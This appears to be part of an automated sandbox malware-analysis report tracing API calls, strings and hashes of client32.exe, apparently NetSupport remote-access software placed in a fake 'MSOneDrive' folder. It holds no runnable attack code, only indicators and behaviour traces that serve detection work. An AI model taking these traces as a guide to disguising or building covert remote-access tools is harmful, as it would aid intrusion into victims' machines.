                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                        • String ID:
                                                        • API String ID: 3515823920-0
                                                        • Opcode ID: 9bfe9a0044719da1540a6c3a3859510d02c70a70b416b29b9435fc6d5270a75b
                                                        • Instruction ID: 588ec97cc091706e3c2c0aaa6ce4e6b1d1c1f942a88aaefcf008b7de89352c8d
                                                        • Opcode Fuzzy Hash: 9bfe9a0044719da1540a6c3a3859510d02c70a70b416b29b9435fc6d5270a75b
                                                        • Instruction Fuzzy Hash: F011C4F1E00A509BDB20CF5DDC45A0BFBECEF41A58F144A2AE466D3740E771F9048A62
                                                        APIs
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        • wsprintfA.USER32 ref: 11134C6E
                                                        • wsprintfA.USER32 ref: 11134C84
                                                          • Part of subcall function 11132680: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110291B,75A38400,?), ref: 11132717
                                                          • Part of subcall function 11132680: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11132737
                                                          • Part of subcall function 11132680: CloseHandle.KERNEL32(00000000), ref: 1113273F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                        • API String ID: 3779116287-2600120591
                                                        • Opcode ID: 6f9fb2a0753f6b8cd2e83ce6ab7fdde4b6155579ab5954c43e92d8c6d65f5ec9
                                                        • Instruction ID: 9c67431b43c70ff94c5574da105f7ccddca851e71d4d99b5eda6b1c9b98572d3
                                                        • Opcode Fuzzy Hash: 6f9fb2a0753f6b8cd2e83ce6ab7fdde4b6155579ab5954c43e92d8c6d65f5ec9
                                                        • Instruction Fuzzy Hash: 180124BAD0420966CB10DBA19C45FEBF7AC8F4421DF000196EC1997144ED20BA04CBD5
                                                        APIs
                                                          • Part of subcall function 11083B60: UnhookWindowsHookEx.USER32(?), ref: 11083B83
                                                        • GetCurrentThreadId.KERNEL32 ref: 110F634B
                                                        • GetThreadDesktop.USER32(00000000), ref: 110F6352
                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110F6362
                                                        • SetThreadDesktop.USER32(00000000), ref: 110F636F
                                                        • CloseDesktop.USER32(00000000), ref: 110F6376
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Desktop$Thread$CloseCurrentHookOpenUnhookWindows
                                                        • String ID:
                                                        • API String ID: 2408936056-0
                                                        • Opcode ID: bf5bd5ec6e24239bd4284135f98232e0e3e86c08e23b3486cbd5775944da8910
                                                        • Instruction ID: 33a7dbd132630a5f65e042d10e45e308f8ac0c24a7c2882920133d3588b1205b
                                                        • Opcode Fuzzy Hash: bf5bd5ec6e24239bd4284135f98232e0e3e86c08e23b3486cbd5775944da8910
                                                        • Instruction Fuzzy Hash: 5EF0C87BF056252FD70267B19C49B7F7A169FC5669F080024F5055B240FF14750183E6
                                                        APIs
                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110291B,75A38400,?), ref: 11132717
                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11132737
                                                        • CloseHandle.KERNEL32(00000000), ref: 1113273F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile$CloseHandle
                                                        • String ID: "
                                                        • API String ID: 1443461169-123907689
                                                        • Opcode ID: d102bea1e6aa5fe3566526d06b5f8e35bf021a81daf64ee8083e2d945d049b8f
                                                        • Instruction ID: 440ab7f6f978ac94d5fbb5a1369e97e0d7071da94511d4ee7fb8c05e869e7eaa
                                                        • Opcode Fuzzy Hash: d102bea1e6aa5fe3566526d06b5f8e35bf021a81daf64ee8083e2d945d049b8f
                                                        • Instruction Fuzzy Hash: B6218E31A04288AFE712DE38DD54BD5BB94AF86325F2041E4EDD5DB1C9DA709A48C750
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,82E0FB89,771B2EE0,?,00000000,1117AD0B,000000FF,?,1102E64C,Client,UseIPC,00000001), ref: 1102BB37
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102BAFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                        • String ID: Client$DisableGeolocation
                                                        • API String ID: 3315423714-4166767992
                                                        • Opcode ID: 082469f737cabc087ebed4c4132e4a8d6814facffb7a87528326485359a24fac
                                                        • Instruction ID: 909c90258048426ad92c62856d2e7a2749a5947dbc84b876734554e22f69ddca
                                                        • Opcode Fuzzy Hash: 082469f737cabc087ebed4c4132e4a8d6814facffb7a87528326485359a24fac
                                                        • Instruction Fuzzy Hash: 3E21DF34A41760BBEB21DB24CC45F9AF7E4A708B18F10426AFD255B3C4EBF4A4008B84
                                                        APIs
                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025F3A
                                                          • Part of subcall function 110C3120: EnterCriticalSection.KERNEL32(00000000,00000000,75A33760,00000000,75A4A1D0,1105952B,?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C313B
                                                          • Part of subcall function 110C3120: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110C3168
                                                          • Part of subcall function 110C3120: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110C317A
                                                          • Part of subcall function 110C3120: LeaveCriticalSection.KERNEL32(?,?,?,?,110252A3,00000000,?,?,00000000), ref: 110C3184
                                                        • TranslateMessage.USER32(?), ref: 11025F50
                                                        • DispatchMessageA.USER32(?), ref: 11025F56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                        • String ID: Exit Msgloop, quit=%d
                                                        • API String ID: 3212272093-2210386016
                                                        • Opcode ID: 93184a9a7f577379092be9016fa146486f24bb93b5182c7edd668e587e3e6a0f
                                                        • Instruction ID: 458663acd1e32bc52ab21155f198d3aa4dad7224c1f0df94b4fde6d061364d2b
                                                        • Opcode Fuzzy Hash: 93184a9a7f577379092be9016fa146486f24bb93b5182c7edd668e587e3e6a0f
                                                        • Instruction Fuzzy Hash: D0F0FC77E111156FDA00DAD59CC1FEFF37CAB84615FC08165EE1593148F631B40587A1
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C803AC4
                                                        • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C80774D,00000000,?,6C80774D,00000000,?,00000FA0,?), ref: 6C803AE4
                                                        • SetLastError.KERNEL32(00000078,00000000,?,6C80774D,00000000,?,00000FA0,?), ref: 6C803AED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: AddressEnumErrorLastModulesProcProcess
                                                        • String ID: EnumProcessModules
                                                        • API String ID: 3858832252-3735562946
APIs
• GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C803B14
• K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C807790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C803B34
• SetLastError.KERNEL32(00000078,00000000,?,6C807790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C803B3D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
• Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
Similarity
• API ID: AddressErrorFileLastModuleNameProc
• String ID: GetModuleFileNameExA
• API String ID: 4084229558-758377266
APIs
• Sleep.KERNEL32(000000FA), ref: 1106B867
• EnterCriticalSection.KERNEL32(?), ref: 1106B874
• LeaveCriticalSection.KERNEL32(?), ref: 1106B946
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeaveSleep
• String ID: Push
• API String ID: 1566154052-4278761818
APIs
• EnterCriticalSection.KERNEL32(6C849898,?,?,00000000,?,6C80C0C1,?,00000000), ref: 6C808C23
• InterlockedExchange.KERNEL32(?,00000000), ref: 6C808C88
• Sleep.KERNEL32(00000000,?,6C80C0C1,?,00000000), ref: 6C808C9E
• LeaveCriticalSection.KERNEL32(6C849898,00000000), ref: 6C808CD0
Memory Dump Source
• Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
• Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
Similarity
• API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
• String ID:
• API String ID: 4212191310-0
APIs
• GetCommandLineW.KERNEL32 ref: 009D1027
• GetStartupInfoW.KERNEL32(?), ref: 009D1084
• GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?), ref: 009D109F
• ExitProcess.KERNEL32 ref: 009D10AC
Memory Dump Source
• Source File: 0000000B.00000002.3741969770.00000000009D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true
• Associated: 0000000B.00000002.3741789673.00000000009D0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_9d0000_client32.jbxd
Yara matches
Similarity
• API ID: CommandExitHandleInfoLineModuleProcessStartup
• String ID:
• API String ID: 2164999147-0
APIs
• GetCurrentProcess.KERNEL32(11027FDF,?,111332C3,?), ref: 1113307C
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\MSOneDrive\client32.exe,00000104,?,111332C3,?), ref: 11133099
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CurrentFileModuleNameProcess
• String ID: C:\Users\user\AppData\Local\MSOneDrive\client32.exe
• API String ID: 2251294070-1094415277
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __strdup
• String ID: *this==pszSrc$..\CTL32\NSMString.cpp
• API String ID: 838363481-1175285396
APIs
• RegCloseKey.ADVAPI32(00000000), ref: 11109571
• RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 111095AE
• RegCloseKey.ADVAPI32(00000000), ref: 111095B5
  • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
Memory Dump Source
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseValue$Query
• String ID:
• API String ID: 392431914-0
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110494A
• __wsplitpath.LIBCMT ref: 11104965
  • Part of subcall function 11157A24: __splitpath_helper.LIBCMT ref: 11157A66
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11104999
Memory Dump Source
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
• String ID:
• API String ID: 1847508633-0
APIs
• GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D41
• OpenProcessToken.ADVAPI32(00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D48
  • Part of subcall function 11096C50: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,?,00000000), ref: 11096C88
  • Part of subcall function 11096C50: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11096CA4
  • Part of subcall function 11096C50: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,111DA704,?,00000001,00000001), ref: 11096CD0
